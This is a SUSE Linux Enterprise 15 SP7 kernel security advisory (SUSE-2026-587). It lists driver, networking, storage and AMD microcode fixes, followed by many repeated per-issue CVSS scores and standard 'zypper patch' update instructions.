- drm/panel-simple: fix connector type for DataImage SCF0700C48GGU18 panel (git-fixes).
- drm/radeon: Remove __counted_by from ClockInfoArray.clockInfo[] (stable-fixes).
- drm/vmwgfx: Fix an error return check in vmw_compat_shader_add() (git-fixes).
- drm/vmwgfx: Merge vmw_bo_release and vmw_bo_free functions (git-fixes).
- exfat: check return value of sb_min_blocksize in exfat_read_boot_sector (git-fixes).
- exfat: fix remount failure in different process environments (git-fixes).
- gpio: omap: do not register driver in probe() (git-fixes).
- gpio: pca953x: Add support for level-triggered interrupts (stable-fixes).
- gpio: pca953x: Utilise dev_err_probe() where it makes sense (stable-fixes).
- gpio: pca953x: Utilise temporary variable for struct device (stable-fixes).
- gpio: pca953x: fix wrong error probe return value (git-fixes).
- gpio: pca953x: handle short interrupt pulses on PCAL devices (git-fixes).
- gpio: rockchip: Stop calling pinctrl for set_direction (git-fixes).
- ice: use netif_get_num_default_rss_queues() (bsc#1247712).
- iio: accel: iis328dq: fix gain values (git-fixes).
- iio: adc: ad7280a: handle spi_setup() errors in probe() (git-fixes).
- iio: adc: ad9467: fix ad9434 vref mask (git-fixes).
- iio: adc: at91-sama5d2_adc: Fix potential use-after-free in sama5d2_adc driver (git-fixes).
- iio: dac: ad5686: add AD5695R to ad5686_chip_info_tbl (git-fixes).
- iio: imu: st_lsm6dsx: fix iio_chan_spec for sensors without event detection (git-fixes).
- intel_th: fix device leak on output open() (git-fixes).
- leds: led-class: Only Add LED to leds_list when it is fully ready (git-fixes).
- lib/crypto: aes: Fix missing MMU protection for AES S-box (git-fixes).
- mISDN: annotate data-race around dev->work (git-fixes).
- mei: me: add nova lake point S DID (stable-fixes).
- mei: me: add wildcat lake P DID (stable-fixes).
- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1253087 bsc#1254447).
- mmc: rtsx_pci_sdmmc: implement sdmmc_card_busy function (git-fixes).
- mmc: sdhci-of-dwcmshc: Prevent illegal clock reduction in HS200/HS400 mode (git-fixes).
- net: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts (git-fixes).
- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).
- net: mana: Add metadata support for xdp mode (git-fixes).
- net: mana: Add standard counter rx_missed_errors (git-fixes).
- net: mana: Add support for auxiliary device servicing events (git-fixes).
- net: mana: Change the function signature of mana_get_primary_netdev_rcu (bsc#1256690).
- net: mana: Drop TX skb on post_work_request failure and unmap resources (git-fixes).
- net: mana: Fix use-after-free in reset service rescan path (git-fixes).
- net: mana: Fix warnings for missing export.h header inclusion (git-fixes).
- net: mana: Handle Reset Request from MANA NIC (git-fixes).
- net: mana: Handle SKB if TX SGEs exceed hardware limit (git-fixes).
- net: mana: Handle hardware recovery events when probing the device (git-fixes).
- net: mana: Handle unsupported HWC commands (git-fixes).
- net: mana: Move hardware counter stats from per-port to per-VF context (git-fixes).
- net: mana: Probe rdma device in mana driver (git-fixes).
- net: mana: Reduce waiting time if HWC not responding (git-fixes).
- net: mana: fix spelling for mana_gd_deregiser_irq() (git-fixes).
- net: tcp: allow zero-window ACK update the window (bsc#1254767).
- net: usb: dm9601: remove broken SR9700 support (git-fixes).
- net: wwan: t7xx: fix potential skb->frags overflow in RX path (git-fixes).
- nfc: llcp: Fix memleak in nfc_llcp_send_ui_frame() (git-fixes).
- nfc: nci: Fix race between rfkill and nci_unregister_device() (git-fixes).
- nfsd: Drop the client reference in client_states_open() (git-fixes).
- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).
- nvmet-auth: update sc_c in host response (git-fixes).
- nvmet-auth: update sc_c in target host hash calculation (git-fixes).
- of: fix reference count leak in of_alias_scan() (git-fixes).
- of: platform: Use default match table for /firmware (git-fixes).
- phy: freescale: imx8m-pcie: assert phy reset during power on (stable-fixes).
- phy: rockchip: inno-usb2: fix communication disruption in gadget mode (git-fixes).
- phy: rockchip: inno-usb2: fix disconnection in gadget mode (git-fixes).
- phy: stm32-usphyc: Fix off by one in probe() (git-fixes).
- phy: tegra: xusb: Explicitly configure HS_DISCON_LEVEL to 0x7 (git-fixes).
- platform/x86/amd: Fix memory leak in wbrf_record() (git-fixes).
- platform/x86: hp-bioscfg: Fix automatic module loading (git-fixes).
- platform/x86: hp-bioscfg: Fix kernel panic in GET_INSTANCE_ID macro (git-fixes).
- platform/x86: hp-bioscfg: Fix kobject warnings for empty attribute names (git-fixes).
- pnfs/flexfiles: Fix memory leak in nfs4_ff_alloc_deviceid_node() (git-fixes).
- powercap: fix race condition in register_control_type() (stable-fixes).
- powercap: fix sscanf() error return value handling (stable-fixes).
- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).
- regmap: Fix race condition in hwspinlock irqsave routine (git-fixes).
- sched/rt: Skip group schedulable check with rt_group_sched=0 (bsc#1256568).
- sched: Increase sched_tick_remote timeout (bsc#1254510).
- scripts/python/git_sort/git_sort.yaml: add cifs for-next repository.
- scripts: obsapi: Support URL trailing / in oscrc.
- scripts: teaapi: Add paging.
- scripts: uploader: Fix no change condition for _maintainership.json.
- scripts: uploader: Handle missing upstream in is_pr_open.
- scrits: teaapi: Add list_repos.
- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).
- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).
- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).
- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).
- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).
- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).
- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).
- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).
- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).
- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).
- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).
- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).
- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).
- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- selftests/bpf: Fix flaky bpf_cookie selftest (git-fixes).
- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).
- serial: 8250_pci: Fix broken RS485 for F81504/508/512 (git-fixes).
- slimbus: core: fix OF node leak on registration failure (git-fixes).
- slimbus: core: fix device reference leak on report present (git-fixes).
- slimbus: core: fix of_slim_get_device() kernel doc (git-fixes).
- slimbus: core: fix runtime PM imbalance on report present (git-fixes).
- smb3: add missing null server pointer check (git-fixes).
- smb: change return type of cached_dir_lease_break() to bool (git-fixes).
- smb: client: ensure open_cached_dir_by_dentry() only returns valid cfid (git-fixes).
- smb: client: fix cifs_pick_channel when channel needs reconnect (git-fixes).
- smb: client: fix warning when reconnecting channel (git-fixes).
- smb: client: introduce close_cached_dir_locked() (git-fixes).
- smb: client: remove unused fid_lock (git-fixes).
- smb: client: short-circuit in open_cached_dir_by_dentry() if !dentry (git-fixes).
- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748 bsc#1257154).
- smb: client: update cfid->last_access_time in open_cached_dir_by_dentry() (git-fixes).
- smb: improve directory cache reuse for readdir operations (bsc#1252712).
- spi: spi-sprd-adi: Fix double free in probe error path (git-fixes).
- spi: sprd-adi: switch to use spi_alloc_host() (stable-fixes).
- spi: sprd: adi: Use devm_register_restart_handler() (stable-fixes).
- svcrdma: return 0 on success from svc_rdma_copy_inline_range (git-fixes).
- uacce: ensure safe queue release with state management (git-fixes).
- uacce: fix cdev handling in the cleanup path (git-fixes).
- uacce: fix isolate sysfs check condition (git-fixes).
- uacce: implement mremap in uacce_vm_ops to return -EPERM (git-fixes).
- usb: core: add USB_QUIRK_NO_BOS for devices that hang on BOS descriptor (stable-fixes).
- usb: dwc3: Check for USB4 IP_NAME (stable-fixes).
- usbnet: limit max_mtu based on device's hard_mtu (git-fixes).
- w1: fix redundant counter decrement in w1_attach_slave_device() (git-fixes).
- w1: therm: Fix off-by-one buffer overflow in alarms_store (git-fixes).
- wifi: ath10k: fix dma_free_coherent() pointer (git-fixes).
- wifi: ath12k: fix dma_free_coherent() pointer (git-fixes).
- wifi: mac80211: correctly decode TTLM with default link map (git-fixes).
- wifi: mac80211: don't perform DA check on S1G beacon (git-fixes).
- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).
- wifi: rsi: Fix memory corruption due to not set vif driver data size (git-fixes).
- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).
- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).
- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).
- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).
- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).
- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any unreleased standalone Zen5 microcode patches
(bsc#1256528).
- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).
- x86/microcode/AMD: Fix __apply_microcode_amd()'s return value (bsc#1256528).
- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).
- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).
- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).
- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).
- x86: make page fault handling disable interrupts properly (git-fixes).
Patchnames: SUSE-2026-587,SUSE-SLE-Module-Live-Patching-15-SP7-2026-587,SUSE-SLE-Module-RT-15-SP7-2026-587
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.3 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
